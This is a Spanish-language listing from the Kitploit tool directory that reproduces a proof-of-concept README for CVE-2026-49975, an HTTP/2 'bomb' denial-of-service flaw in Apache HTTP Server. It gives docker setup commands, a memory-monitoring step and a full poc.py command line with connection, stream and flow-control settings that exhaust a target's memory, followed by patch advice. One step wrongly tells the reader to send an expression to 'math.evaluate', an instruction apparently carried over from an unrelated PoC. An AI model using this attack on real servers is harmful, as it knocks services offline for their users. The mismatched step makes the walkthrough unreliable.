Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-49975 — HTTP/2 Bomb | Kitploit
Herramientas/GitHubGitHub/eqstlab/cve-2026-49975
Análisis de VulnerabilidadesExplotaciónSeguridad WebFuzzingPruebas de Penetración
GitHubeqstlab/cve-2026-49975

CVE-2026-49975

HTTP/2 Bomb

Ver Repositorio
143hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-49975 Bomba HTTP/2

★ CVE-2026-49975 PoC de Bomba HTTP/2 ★

https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74


Resumen

CVE-2026-49975 es una vulnerabilidad de Denegación de Servicio (DoS) en Apache HTTP Server. La vulnerabilidad ocurre en la ruta de manejo de solicitudes HTTP/2, donde múltiples campos de cabecera cookie pueden fusionarse sin ser contabilizados adecuadamente contra LimitRequestFields. Al enviar una pequeña solicitud HTTP/2 codificada en HPACK que se expande en muchos campos de cabecera cookie, un atacante puede forzar al servidor a asignar memoria repetidamente durante la fusión de cabeceras Cookie. El atacante puede entonces usar el control de flujo HTTP/2 para retrasar la transmisión de la respuesta, manteniendo abiertos los flujos afectados e impidiendo que la memoria asignada sea liberada.


Versiones Afectadas

CategoríaVersión
VulnerableApache HTTP Server 2.4.17 ≤ versión ≤ 2.4.67
CorregidaApache HTTP Server 2.4.68 o posterior

Impacto

  • Denegación de Servicio (DoS) remota
  • Consumo excesivo de memoria
  • Procesamiento retrasado o fallido de solicitudes de usuario normales

Entorno

Construye y ejecuta el entorno vulnerable de Apache HTTP Server.

root@kitploit:~
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975

PoC

Después de iniciar el entorno vulnerable, sigue los pasos a continuación para reproducir el ataque.

Paso 1. Monitorear el uso de memoria del servidor

root@kitploit:~
docker stats cve-2026-49975

Ejemplo de salida:

root@kitploit:~
CONTAINER ID   NAME             CPU %   MEM USAGE / LIMIT     MEM %
xxxxxxxxxxxx   cve-2026-49975   0.5%    35.2MiB / 8.0GiB      1.7%

Paso 2. Ejecutar el PoC de Bomba HTTP/2

Envía la siguiente expresión a math.evaluate (por ejemplo, a través de la entrada de cálculo de la aplicación).

root@kitploit:~
python3 poc.py \
  --host TARGET_IP \
  --port 10081 \
  --connections 10 \
  --streams 100 \
  --refs 4091 \
  --initial-window 0 \
  --hold 300 \
  --drip-interval 2 \
  --drip-bytes 1

Paso 3. Confirmar el resultado

Verifica que el uso de memoria del contenedor Apache aumente y permanezca alto mientras los flujos de ataque se mantienen abiertos.

Mitigación

  • Actualiza Apache HTTP Server a 2.4.68 o posterior
  • Considera deshabilitar HTTP/2 temporalmente si el servicio no lo requiere

Análisis

  • KR: https://www.skshieldus.com/security-insights/reports/eqst-apache-http2-dos-cve-2026-49975
  • EN:
Descargar herramienta